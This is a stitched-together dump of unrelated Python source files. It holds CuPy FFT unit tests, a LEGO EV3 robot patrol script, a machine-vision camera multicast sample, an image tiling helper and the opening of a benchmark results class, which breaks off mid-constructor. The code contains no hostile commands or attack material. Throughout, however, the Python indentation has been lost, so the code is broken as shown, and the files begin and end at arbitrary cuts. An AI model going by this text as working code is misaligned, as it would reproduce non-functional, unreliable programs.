def test_rfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape, value_type='R2C')
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.rfft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.rfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape, value_type='C2R')
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.irfft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.irfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.for_all_dtypes(no_complex=True)
def test_rfft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import rfft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(5*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b, value_type='R2C')
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
rfft(a, n=self.n, norm=self.norm)
# targeting a particular error
assert 'Target array size does not match the plan.' in str(ex.value)
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': (1, None), 'axes': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2)},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestRfft2:
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfft2(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.rfft2(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfft2(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
if (10020 >= cupy.cuda.runtime.runtimeGetVersion() >= 10010
and int(cupy.cuda.device.get_compute_capability()) < 70
and _size_last_transform_axis(
self.shape, self.s, self.axes) == 2):
pytest.skip('work-around for cuFFT issue')
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.irfft2(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (), 'norm': None},
)
@testing.gpu
class TestRfft2EmptyAxes:
@testing.for_all_dtypes(no_complex=True)
def test_rfft2(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.rfft2(a, s=self.s, axes=self.axes, norm=self.norm)
@testing.for_all_dtypes()
def test_irfft2(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.irfft2(a, s=self.s, axes=self.axes, norm=self.norm)
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': (1, None), 'axes': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2)},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestRfftn:
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfftn(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_orders('CF')
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfftn(self, xp, dtype, order, enable_nd):
assert config.enable_nd_planning == enable_nd
if (10020 >= cupy.cuda.runtime.runtimeGetVersion() >= 10010
and int(cupy.cuda.device.get_compute_capability()) < 70
and _size_last_transform_axis(
self.shape, self.s, self.axes) == 2):
pytest.skip('work-around for cuFFT issue')
a = testing.shaped_random(self.shape, xp, dtype)
if order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
# Only those tests in which a legit plan can be obtained are kept
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': (1, None), 'axes': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2)},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestPlanCtxManagerRfftn:
@pytest.fixture(autouse=True)
def skip_buggy(self):
if cupy.cuda.runtime.is_hip:
# TODO(leofang): test newer ROCm versions
if (self.axes == (0, 1) and self.shape == (2, 3, 4)):
pytest.skip("hipFFT's PlanNd for this case "
"is buggy, so Plan1d is generated "
"instead")
@nd_planning_states()
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes, value_type='R2C')
with plan:
out = xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason="hipFFT's PlanNd for C2R is buggy")
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes, value_type='C2R')
with plan:
out = xp.fft.irfftn(
a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
# TODO(leofang): write test_rfftn_error_on_wrong_plan()?
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*(
testing.product_dict([
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1)},
{'shape': (3, 4), 's': None, 'axes': (-1, -2)},
{'shape': (3, 4), 's': None, 'axes': (0,)},
{'shape': (3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1)},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3)},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1)},
{'shape': (2, 3, 4), 's': None, 'axes': None},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None},
],
testing.product({'norm': [None, 'backward', 'ortho', 'forward', '']})
)
))
@testing.gpu
class TestRfftnContiguity:
@nd_planning_states([True])
@testing.for_float_dtypes()
def test_rfftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.rfftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes,
value_type='R2C')
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
assert out.flags.c_contiguous == a.flags.c_contiguous
assert out.flags.f_contiguous == a.flags.f_contiguous
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_ifftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.irfftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes,
value_type='C2R')
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
assert out.flags.c_contiguous == a.flags.c_contiguous
assert out.flags.f_contiguous == a.flags.f_contiguous
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (), 'norm': None},
)
@testing.gpu
class TestRfftnEmptyAxes:
@testing.for_all_dtypes(no_complex=True)
def test_rfftn(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
@testing.for_all_dtypes()
def test_irfftn(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
@pytest.mark.usefixtures('skip_forward_backward')
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'backward', 'ortho', 'forward', ''],
}))
@testing.gpu
class TestHfft:
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_hfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.hfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ihfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ihfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'n': 1, 'd': 1},
{'n': 10, 'd': 0.5},
{'n': 100, 'd': 2},
)
@testing.gpu
class TestFftfreq:
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftfreq(self, xp, dtype):
out = xp.fft.fftfreq(self.n, self.d)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfftfreq(self, xp, dtype):
out = xp.fft.rfftfreq(self.n, self.d)
return out
@testing.parameterize(
{'shape': (5,), 'axes': None},
{'shape': (5,), 'axes': 0},
{'shape': (10,), 'axes': None},
{'shape': (10,), 'axes': 0},
{'shape': (10, 10), 'axes': None},
{'shape': (10, 10), 'axes': 0},
{'shape': (10, 10), 'axes': (0, 1)},
)
@testing.gpu
class TestFftshift:
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftshift(x, self.axes)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ifftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftshift(x, self.axes)
return out
class TestThreading:
def test_threading1(self):
import threading
from cupy.cuda.cufft import get_current_plan
def thread_get_curr_plan():
cupy.cuda.Device().use()
return get_current_plan()
new_thread = threading.Thread(target=thread_get_curr_plan)
new_thread.start()
def test_threading2(self):
import threading
a = cupy.arange(100, dtype=cupy.complex64).reshape(10, 10)
def thread_do_fft():
cupy.cuda.Device().use()
b = cupy.fft.fftn(a)
return b
new_thread = threading.Thread(target=thread_do_fft)
new_thread.start()
|
sem_walk.py
|
#!/usr/bin/env python3
from ev3dev2.motor import MediumMotor, OUTPUT_A, OUTPUT_B, OUTPUT_C, OUTPUT_D, SpeedPercent, MoveSteering
from ev3dev2.sound import Sound
from ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3, INPUT_4
from ev3dev2.sensor.lego import InfraredSensor, ColorSensor, TouchSensor
from time import sleep
import time, logging, threading
#---------- Documentação -------------#
# INPUT_1 - InfraredSensor
# INPUT_2 - TouchSensor
# INPUT_3
# INPUT_4 - ColorSensor
# OUTPUT_A
# OUTPUT_B - MoveTank (Motor Esquerdo)
# OUTPUT_C - MoveTank (Motor Direito)
# OUTPUT_D - MediumMotor (Motor de Tiro)
#-------------------------------------- AÇÕES ---------------------------------------#
sleep_time = 0.3
DEFAULT_SLEEP_TIMEOUT_IN_SEC = 0.05
CANAL = 3
def oneShooter():
tank_shooter = MediumMotor(OUTPUT_D)
tank_shooter.on_for_rotations(SpeedPercent(75), 4)
def walkSeconds(direction, velocity, seconds):
steering_drive = MoveSteering(OUTPUT_B, OUTPUT_C)
steering_drive.on_for_seconds(direction, SpeedPercent(velocity), seconds)
def walkRotations(direction, velocity, rotations):
steering_drive = MoveSteering(OUTPUT_B, OUTPUT_C)
steering_drive.on_for_rotations(direction, SpeedPercent(velocity), rotations)
#-------------------------------------- MÉTODOS DE MOVIMENTO ---------------------------------------#
def walkOnly():
walkSeconds(0,50,5)
def walkRight():
walkRotations(-20,50,2)
def turnRight():
walkSeconds(100,50,1)
# walkRotations(-100,50,1)
def turnLeft():
walkRotations(-100,50,1)
def walkLeft():
walkRotations(20,50,2)
def walkBack():
walkRotations(-100,50,3)
#-------------------------------------- WORKERS ---------------------------------------#
def proxDetectWorker():
global stopMotorSensor
global stopProxSensor
global stopInfraredSensor
global infrared_sensor
shots=3
infrared_sensor.mode = 'IR-PROX'
while True:
if(stopProxSensor):
break
distance = infrared_sensor.value()
if distance < 5:
stopMotorSensor=True
time.sleep(0.5)
turnRight()
stopMotorSensor=False
t2 = threading.Thread(target=onlyWalkWorker)
t2.start()
def turnRightWorker():
global sleep_time
while True:
turnRight()
print(sleep_time)
time.sleep(sleep_time)
sleep_time=0.3
def patrulha():
global infrared_sensor
infrared_sensor.mode = 'IR-SEEK'
while True:
dis = infrared_sensor.heading_and_distance(CANAL)
if dis[0] != None and dis[1] != None:
if dis[0] < 0:
time = ((dis[0] * 2.2)/100.0) * (-1)
if time == 0:
walkSeconds(-100, 100, 0.75)
walkSeconds(-100, 100, time)
else:
time = ((dis[0] * 2.2)/100.0)
if time == 0:
walkSeconds(100, 100, 0.75)
walkSeconds(100, 100, time)
dis = infrared_sensor.heading_and_distance(CANAL)
if dis[0] != None and dis[1] != None and dis[0] > -2 and dis[0] < 2 and dis[1] < 60:
oneShooter()
else:
walkSeconds(100,50,1)
def onlyWalkWorker():
global stopInfraredSensor
global stopMotorSensor
while True:
if(stopMotorSensor):
break
walkOnly()
# movimentação com paradas
def onlyWalkWithStopWorker():
global stopInfraredSensor
global stopMotorSensor
while True:
if(stopMotorSensor):
break
time.sleep(0.2)
walkRotations(0,100,2)
time.sleep(0.2)
#-------------------------------------- MAIN ---------------------------------------#
ts = TouchSensor(INPUT_2)
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
while not ts.is_pressed:
time.sleep(0.2)
def main():
global stopInfraredSensor
global stopMotorSensor
global stopGiraSensor
# global stopProxSensor
global infrared_sensor
infrared_sensor = InfraredSensor(INPUT_1)
stopInfraredSensor=False
stopMotorSensor=False
stopGiraSensor=False
# stopProxSensor=False
# t1 = threading.Thread(target=robotDetectWorker)
# t1.start()
#
# t2 = threading.Thread(target=onlyWalkWithStopWorker)
# t2.start()
walkSeconds(0,100,6)
# tp = threading.Thread(target=patrulha)
# tp.start()
patrulha()
main()
|
MultiCast.py
|
# -- coding: utf-8 --
import sys
import threading
import msvcrt
from ctypes import *
sys.path.append("../MvImport")
from MvCameraControl_class import *
g_bExit = False
# 为线程定义一个函数
def work_thread(cam=0, pData=0, nDataSize=0):
stFrameInfo = MV_FRAME_OUT_INFO_EX()
memset(byref(stFrameInfo), 0, sizeof(stFrameInfo))
while True:
ret = cam.MV_CC_GetOneFrameTimeout(pData, nDataSize, stFrameInfo, 1000)
if ret == 0:
print ("get one frame: Width[%d], Height[%d], nFrameNum[%d]" % (stFrameInfo.nWidth, stFrameInfo.nHeight, stFrameInfo.nFrameNum))
else:
print ("no data[0x%x]" % ret)
if g_bExit == True:
break
if __name__ == "__main__":
deviceList = MV_CC_DEVICE_INFO_LIST()
tlayerType = MV_GIGE_DEVICE | MV_USB_DEVICE
# ch:枚举设备 | en:Enum device
ret = MvCamera.MV_CC_EnumDevices(tlayerType, deviceList)
if ret != 0:
print ("enum devices fail! ret[0x%x]" % ret)
sys.exit()
if deviceList.nDeviceNum == 0:
print ("find no device!")
sys.exit()
print ("find %d devices!" % deviceList.nDeviceNum)
for i in range(0, deviceList.nDeviceNum):
mvcc_dev_info = cast(deviceList.pDeviceInfo[i], POINTER(MV_CC_DEVICE_INFO)).contents
if mvcc_dev_info.nTLayerType == MV_GIGE_DEVICE:
print ("\ngige device: [%d]" % i)
strModeName = ""
for per in mvcc_dev_info.SpecialInfo.stGigEInfo.chModelName:
strModeName = strModeName + chr(per)
print ("device model name: %s" % strModeName)
nip1 = ((mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0xff000000) >> 24)
nip2 = ((mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0x00ff0000) >> 16)
nip3 = ((mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0x0000ff00) >> 8)
nip4 = (mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0x000000ff)
print ("current ip: %d.%d.%d.%d\n" % (nip1, nip2, nip3, nip4))
elif mvcc_dev_info.nTLayerType == MV_USB_DEVICE:
print ("\nu3v device: [%d]" % i)
strModeName = ""
for per in mvcc_dev_info.SpecialInfo.stUsb3VInfo.chModelName:
if per == 0:
break
strModeName = strModeName + chr(per)
print ("device model name: %s" % strModeName)
strSerialNumber = ""
for per in mvcc_dev_info.SpecialInfo.stUsb3VInfo.chSerialNumber:
if per == 0:
break
strSerialNumber = strSerialNumber + chr(per)
print ("user serial number: %s" % strSerialNumber)
nConnectionNum = input("please input the number of the device to connect:")
if int(nConnectionNum) >= deviceList.nDeviceNum:
print ("intput error!")
sys.exit()
# ch:创建相机实例 | en:Creat Camera Object
cam = MvCamera()
# ch:选择设备并创建句柄 | en:Select device and create handle
stDeviceList = cast(deviceList.pDeviceInfo[int(nConnectionNum)], POINTER(MV_CC_DEVICE_INFO)).contents
ret = cam.MV_CC_CreateHandle(stDeviceList)
if ret != 0:
print ("create handle fail! ret[0x%x]" % ret)
sys.exit()
#ch:询问用户启动多播控制应用程序或多播监控应用程序
#en:Ask the user to launch: the multicast controlling application or the multicast monitoring application.
print ("start multicast sample in (c)ontrol or in (m)onitor mode? (c/m)")
key = msvcrt.getch()
key = bytes.decode(key)
#ch:查询用户使用的模式 | en:Query the user for the mode to use.
monitor = False
if key == 'm' or key == 'M':
monitor = True
elif key == 'c' or key == 'C':
monitor = False
else:
print ("intput error!")
sys.exit()
if monitor:
ret = cam.MV_CC_OpenDevice(MV_ACCESS_Monitor, 0)
if ret != 0:
print ("open device fail! ret[0x%x]" % ret)
sys.exit()
else:
ret = cam.MV_CC_OpenDevice(MV_ACCESS_Control, 0)
if ret != 0:
print ("open device fail! ret[0x%x]" % ret)
sys.exit()
# ch:探测网络最佳包大小(只对GigE相机有效) | en:Detection network optimal package size(It only works for the GigE camera)
if stDeviceList.nTLayerType == MV_GIGE_DEVICE:
nPacketSize = cam.MV_CC_GetOptimalPacketSize()
if int(nPacketSize) > 0:
ret = cam.MV_CC_SetIntValue("GevSCPSPacketSize",nPacketSize)
if ret != 0:
print ("Warning: Set Packet Size fail! ret[0x%x]" % ret)
else:
print ("Warning: Get Packet Size fail! ret[0x%x]" % nPacketSize)
#ch:获取数据包大小 | en:Get payload size
stParam = MVCC_INTVALUE()
memset(byref(stParam), 0, sizeof(MVCC_INTVALUE))
ret = cam.MV_CC_GetIntValue("PayloadSize", stParam)
if ret != 0:
print ("get payload size fail! ret[0x%x]" % ret)
sys.exit()
nPayloadSize = stParam.nCurValue
#ch:指定组播ip | en:multicast IP
strIp = "239.0.1.23"
device_ip_list = strIp.split('.')
dest_ip = (int(device_ip_list[0]) << 24) | (int(device_ip_list[1]) << 16) | (int(device_ip_list[2]) << 8) | int(device_ip_list[3])
print ("dest ip: %s" % strIp)
#ch:可指定端口号作为组播组端口 | en:multicast port
stTransmissionType = MV_TRANSMISSION_TYPE()
memset(byref(stTransmissionType), 0, sizeof(MV_TRANSMISSION_TYPE))
stTransmissionType.enTransmissionType = MV_GIGE_TRANSTYPE_MULTICAST
stTransmissionType.nDestIp = dest_ip
stTransmissionType.nDestPort = 8787
ret = cam.MV_GIGE_SetTransmissionType(stTransmissionType)
if MV_OK != ret:
print ("set transmission type fail! ret [0x%x]" % ret)
# ch:开始取流 | en:Start grab image
ret = cam.MV_CC_StartGrabbing()
if ret != 0:
print ("start grabbing fail! ret[0x%x]" % ret)
sys.exit()
data_buf = (c_ubyte * nPayloadSize)()
try:
hThreadHandle = threading.Thread(target=work_thread, args=(cam, byref(data_buf), nPayloadSize))
hThreadHandle.start()
except:
print ("error: unable to start thread")
print ("press a key to stop grabbing.")
msvcrt.getch()
g_bExit = True
hThreadHandle.join()
# ch:停止取流 | en:Stop grab image
ret = cam.MV_CC_StopGrabbing()
if ret != 0:
print ("stop grabbing fail! ret[0x%x]" % ret)
del data_buf
sys.exit()
# ch:关闭设备 | Close device
ret = cam.MV_CC_CloseDevice()
if ret != 0:
print ("close deivce fail! ret[0x%x]" % ret)
del data_buf
sys.exit()
# ch:销毁句柄 | Destroy handle
ret = cam.MV_CC_DestroyHandle()
if ret != 0:
print ("destroy handle fail! ret[0x%x]" % ret)
del data_buf
sys.exit()
del data_buf
|
graphics.py
|
import numpy as np
from PIL import Image
import time
import threading
def save_image(x, path):
im = Image.fromarray(x)
im.save(path, optimize=True)
return
# Assumes [NCHW] format
def save_raster(x, path, rescale=False, width=None):
t = threading.Thread(target=_save_raster, args=(x, path, rescale, width))
t.start()
def _save_raster(x, path, rescale, width):
x = to_raster(x, rescale, width)
save_image(x, path)
# Shape: (n_patches,rows,columns,channels)
def to_raster_old(x, rescale=False, width=None):
x = np.transpose(x, (0, 3, 1, 2))
#x = x.swapaxes(2, 3)
if len(x.shape) == 3:
x = x.reshape((x.shape[0], 1, x.shape[1], x.shape[2]))
if x.shape[1] == 1:
x = np.repeat(x, 3, axis=1)
if rescale:
x = (x - x.min()) / (x.max() - x.min()) * 255.
x = np.clip(x, 0, 255)
assert len(x.shape) == 4
assert x.shape[1] == 3
n_patches = x.shape[0]
if width is None:
width = int(np.ceil(np.sqrt(n_patches))) # result width
height = int(n_patches/width) # result height
tile_height = x.shape[2]
tile_width = x.shape[3]
result = np.zeros((3, int(height*tile_height),
int(width*tile_width)), dtype='uint8')
for i in range(height):
for j in range(width):
result[:, i*tile_height:(i+1)*tile_height,
j*tile_width:(j+1)*tile_width] = x[i]
return result
# Shape: (n_patches,rows,columns,channels)
def to_raster(x, rescale=False, width=None):
if len(x.shape) == 3:
x = x.reshape((x.shape[0], x.shape[1], x.shape[2], 1))
if x.shape[3] == 1:
x = np.repeat(x, 3, axis=3)
if rescale:
x = (x - x.min()) / (x.max() - x.min()) * 255.
x = np.clip(x, 0, 255)
assert len(x.shape) == 4
assert x.shape[3] == 3
n_batch = x.shape[0]
if width is None:
width = int(np.ceil(np.sqrt(n_batch))) # result width
height = int(n_batch / width) # result height
tile_height = x.shape[1]
tile_width = x.shape[2]
result = np.zeros((int(height * tile_height),
int(width * tile_width), 3), dtype='uint8')
for i in range(height):
for j in range(width):
result[i * tile_height:(i + 1) * tile_height, j *
tile_width:(j + 1) * tile_width] = x[width*i+j]
return result
|
results.py
|
from toolset.utils.output_helper import log
import os
import subprocess
import uuid
import time
import json
import requests
import threading
import re
import math
import csv
import traceback
from datetime import datetime
# Cross-platform colored text
from colorama import Fore, Style
class Results:
def __init__(self, benchmarker):
'''
Constructor
'''
self.benchmarker = benchmarker
self.config = benchmarker.config
self.directory = os.path.join(self.config.results_root,
self.config.timestamp)
try:
os.makedirs(self.directory)
except OSError:
pass
self.file = os.path.join(self.directory, "results.json")
self.uuid = str(uuid.uuid4())
self.name = datetime.now().strftime(self.config.results_name)
self.environmentDescription = self.config.results_environment
try:
self.git = dict()
self.git['commitId'] = self.__get_git_commit_id()
self.git['repositoryUrl'] = self.__get_git_repository_url()
self.git['branchName'] = self.__get_git_branch_name()
except Exception:
#Could not read local git repository, which is fine.
self.git = None
self.startTime = int(round(time.time() * 1000))
self.completionTime = None
self.concurrencyLevels = self.config.concurrency_levels
self.pipelineConcurrencyLevels = self.config.pipeline_concurrency_levels
self.queryIntervals = self.config.query_levels
self.cachedQueryIntervals = self.config.cached_query_levels
self.frameworks = [t.name for t in benchmarker.tests]
self.duration = self.config.duration
self.rawData = dict()
self.rawData['json'] = dict()
self.rawData['db'] = dict()
self.rawData['query'] = dict()
self.rawData['fortune'] = dict()
self.rawData['update'] = dict()
self.rawData['plaintext'] = dict()
self.rawData['cached_query'] = dict()
self.completed = dict()
self.succeeded = dict()
self.succeeded['json'] = []
self.succeeded['db'] = []
self.succeeded['query'] = []
self.succeeded['fortune'] = []
self.succeeded['update'] = []
self.succeeded['plaintext'] = []
self.succeeded['cached_query'] = []
self.failed = dict()
self.failed['json'] = []
self.failed['db'] = []
self.failed['query'] = []
self.failed['fortune'] = []
self.failed['update'] = []
self.failed['plaintext'] = []
